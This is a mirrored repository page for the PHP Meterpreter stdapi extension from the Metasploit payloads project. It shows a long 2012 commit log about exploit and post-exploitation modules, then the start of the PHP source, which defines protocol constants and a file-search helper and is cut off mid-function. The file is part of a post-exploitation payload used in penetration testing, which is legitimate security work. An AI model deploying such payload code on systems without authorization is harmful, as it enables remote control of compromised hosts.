github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity
f0ce88390a
metasploit-payloads/php/meterpreter/ext_server_stdapi.php
James Lee f0ce88390a Squashed commit of the following: 
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes ]

commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See ]

commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves  on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 17:00:02 -06:00

1075 lines
36 KiB
PHP
Executable File
Raw Blame History

#<?php
##
# STDAPI
##
##
# General
##
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
##
# Fs
##
define("TLV_TYPE_DIRECTORY_PATH", TLV_META_TYPE_STRING | 1200);
define("TLV_TYPE_FILE_NAME", TLV_META_TYPE_STRING | 1201);
define("TLV_TYPE_FILE_PATH", TLV_META_TYPE_STRING | 1202);
define("TLV_TYPE_FILE_MODE", TLV_META_TYPE_STRING | 1203);
define("TLV_TYPE_FILE_SIZE", TLV_META_TYPE_UINT | 1204);
define("TLV_TYPE_STAT_BUF", TLV_META_TYPE_COMPLEX | 1220);
define("TLV_TYPE_SEARCH_RECURSE", TLV_META_TYPE_BOOL | 1230);
define("TLV_TYPE_SEARCH_GLOB", TLV_META_TYPE_STRING | 1231);
define("TLV_TYPE_SEARCH_ROOT", TLV_META_TYPE_STRING | 1232);
define("TLV_TYPE_SEARCH_RESULTS", TLV_META_TYPE_GROUP | 1233);
##
# Net
##
define("TLV_TYPE_HOST_NAME", TLV_META_TYPE_STRING | 1400);
define("TLV_TYPE_PORT", TLV_META_TYPE_UINT | 1401);
define("TLV_TYPE_SUBNET", TLV_META_TYPE_RAW | 1420);
define("TLV_TYPE_NETMASK", TLV_META_TYPE_RAW | 1421);
define("TLV_TYPE_GATEWAY", TLV_META_TYPE_RAW | 1422);
define("TLV_TYPE_NETWORK_ROUTE", TLV_META_TYPE_GROUP | 1423);
define("TLV_TYPE_IP", TLV_META_TYPE_RAW | 1430);
define("TLV_TYPE_MAC_ADDRESS", TLV_META_TYPE_RAW | 1431);
define("TLV_TYPE_MAC_NAME", TLV_META_TYPE_STRING | 1432);
define("TLV_TYPE_NETWORK_INTERFACE", TLV_META_TYPE_GROUP | 1433);
define("TLV_TYPE_SUBNET_STRING", TLV_META_TYPE_STRING | 1440);
define("TLV_TYPE_NETMASK_STRING", TLV_META_TYPE_STRING | 1441);
define("TLV_TYPE_GATEWAY_STRING", TLV_META_TYPE_STRING | 1442);
# Socket
define("TLV_TYPE_PEER_HOST", TLV_META_TYPE_STRING | 1500);
define("TLV_TYPE_PEER_PORT", TLV_META_TYPE_UINT | 1501);
define("TLV_TYPE_LOCAL_HOST", TLV_META_TYPE_STRING | 1502);
define("TLV_TYPE_LOCAL_PORT", TLV_META_TYPE_UINT | 1503);
define("TLV_TYPE_CONNECT_RETRIES", TLV_META_TYPE_UINT | 1504);
define("TLV_TYPE_SHUTDOWN_HOW", TLV_META_TYPE_UINT | 1530);
##
# Sys
##
define("PROCESS_EXECUTE_FLAG_HIDDEN", (1 << 0));
define("PROCESS_EXECUTE_FLAG_CHANNELIZED", (1 << 1));
define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
# Registry
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
define("TLV_TYPE_KEY_NAME", TLV_META_TYPE_STRING | 1003);
define("TLV_TYPE_VALUE_NAME", TLV_META_TYPE_STRING | 1010);
define("TLV_TYPE_VALUE_TYPE", TLV_META_TYPE_UINT | 1011);
define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012);
# Config
define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040);
define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041);
define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
# Process
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
define("TLV_TYPE_PID", TLV_META_TYPE_UINT | 2300);
define("TLV_TYPE_PROCESS_NAME", TLV_META_TYPE_STRING | 2301);
define("TLV_TYPE_PROCESS_PATH", TLV_META_TYPE_STRING | 2302);
define("TLV_TYPE_PROCESS_GROUP", TLV_META_TYPE_GROUP | 2303);
define("TLV_TYPE_PROCESS_FLAGS", TLV_META_TYPE_UINT | 2304);
define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
define("TLV_TYPE_REGISTER_SIZE", TLV_META_TYPE_UINT | 2541);
define("TLV_TYPE_REGISTER_VALUE_32", TLV_META_TYPE_UINT | 2542);
define("TLV_TYPE_REGISTER", TLV_META_TYPE_GROUP | 2550);
##
# Ui
##
define("TLV_TYPE_IDLE_TIME", TLV_META_TYPE_UINT | 3000);
define("TLV_TYPE_KEYS_DUMP", TLV_META_TYPE_STRING | 3001);
define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
##
# Event Log
##
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
define("TLV_TYPE_EVENT_RECORDOFFSET", TLV_META_TYPE_UINT | 4004);
define("TLV_TYPE_EVENT_RECORDNUMBER", TLV_META_TYPE_UINT | 4006);
define("TLV_TYPE_EVENT_TIMEGENERATED", TLV_META_TYPE_UINT | 4007);
define("TLV_TYPE_EVENT_TIMEWRITTEN", TLV_META_TYPE_UINT | 4008);
define("TLV_TYPE_EVENT_ID", TLV_META_TYPE_UINT | 4009);
define("TLV_TYPE_EVENT_TYPE", TLV_META_TYPE_UINT | 4010);
define("TLV_TYPE_EVENT_CATEGORY", TLV_META_TYPE_UINT | 4011);
define("TLV_TYPE_EVENT_STRING", TLV_META_TYPE_STRING | 4012);
define("TLV_TYPE_EVENT_DATA", TLV_META_TYPE_RAW | 4013);
##
# Power
##
define("TLV_TYPE_POWER_FLAGS", TLV_META_TYPE_UINT | 4100);
define("TLV_TYPE_POWER_REASON", TLV_META_TYPE_UINT | 4101);
##
# Errors
##
# Special return value to match up with Windows error codes for network
# errors.
define("ERROR_CONNECTION_ERROR", 10000);
# Wrap everything in checks for existence of the new functions in case we get
# eval'd twice
my_print("Evaling stdapi");
##
# Search Helpers
##
# Stolen from user comments in http://us2.php.net/manual/en/function.glob.php
# The recursiveness was busted, fixed it by adding the path to the filename
# when checking whether we're looking at a directory.
# Used by stdapi_fs_search
/**#@+
* Extra GLOB constant for safe_glob()
*/
define('GLOB_NODIR',256);
define('GLOB_PATH',512);
define('GLOB_NODOTS',1024);
define('GLOB_RECURSE',2048);
/**#@-*/
/**
* A safe empowered glob().
*
* Function glob() is prohibited on some server (probably in safe mode)
* (Message "Warning: glob() has been disabled for security reasons in
* (script) on line (line)") for security reasons as stated on:
* http://seclists.org/fulldisclosure/2005/Sep/0001.html
*
* safe_glob() intends to replace glob() using readdir() & fnmatch() instead.
* Supported flags: GLOB_MARK, GLOB_NOSORT, GLOB_ONLYDIR
* Additional flags: GLOB_NODIR, GLOB_PATH, GLOB_NODOTS, GLOB_RECURSE
* (not original glob() flags)
* @author BigueNique AT yahoo DOT ca
* @updates
* - 080324 Added support for additional flags: GLOB_NODIR, GLOB_PATH,
* GLOB_NODOTS, GLOB_RECURSE
*/
if (!function_exists('safe_glob')) {
function safe_glob($pattern, $flags=0) {
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
